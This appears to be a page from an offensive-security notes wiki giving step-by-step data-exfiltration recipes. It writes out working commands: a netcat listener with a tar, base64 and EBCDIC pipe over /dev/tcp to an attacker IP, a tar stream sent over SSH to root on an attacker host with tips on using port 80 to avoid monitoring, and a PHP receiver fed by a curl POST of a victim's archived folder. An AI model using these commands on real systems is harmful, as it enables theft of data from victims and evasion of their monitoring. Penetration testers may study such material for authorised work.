Data Exfiltration

- Exfil over TCP Socket with EBCDIC and Base64

First open a listener on attacker machine:

nc -lvnp 80 > datafolder.tmp

On target system:

tar zcf - /tmp/datafolder | base64 | dd conv=ebcdic /dev/tcp/<attackerIP>/80

Now decode the information on the attacker machine:

dd conv=ascii if=datafolder.tmp | base64 -d > datafolder.tar

tar xf datafolder.tar

- Exfil over SSH

Since SSH is encrypted it is less likely to be caught doing this

On target system:

tar zcf - /tmp/datafolder | ssh root@<attacker_ip> "cd /tmp; tar zxpf -"

On attacker machine:

The information is ready to view in the tmp/datafolder

If we want to be really stealthy we can configure ssh to use port 80, incase port 22 is being monitored

- Exfil via POST Request over HTTPS

On attacker machine:

Make a contact.php file in /tmp/datafolder.base64

<?php file_put_contents('/tmp/datafolder.base64', file_get_contents('php://input')); ?>

On victim machine:

curl --data "$(tar zcf - /tmp/datafolder | base64)" https://<attacker_ip>/contact.php

On attacker machine:

cat /tmp/datafolder.base64 | base64 -d > datafolder.tar && tar xf datafolder.tar

PreviousManual BackdoorsNextPillaging/Data Harvesting

Last updated